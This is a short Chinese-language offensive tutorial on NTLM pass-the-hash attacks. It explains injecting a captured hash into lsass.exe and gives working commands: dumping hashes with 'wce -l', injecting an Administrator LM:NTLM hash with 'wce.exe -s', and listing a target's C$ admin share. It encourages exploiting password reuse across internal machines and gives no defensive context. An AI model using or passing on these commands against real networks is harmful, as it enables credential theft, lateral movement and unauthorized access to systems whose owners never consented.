原理:
hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了,hash注入本身是为了对付那些破解不了的NTLM HASH。
操作:
1.先使用wce获取一台内网机器的hash值,太复杂无法破解。
wce -l
2.由于使用习惯,许多情况下内网很多机器的密码是一样的(密码一致时哈希值也是一样的)在其他机器尝试用拿到的hash来登陆,如果账号密码一样就可登陆,这里用ping命令获取目标机名或者域名。
3.利用之前获取的hash值登陆,没有ntlmhash可用0代替。
wce.exe -s Administrator:WIN-B1CT7I56261:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942
4.远程访问目标机c盘默认共享文件。
dir \\目标IP\c$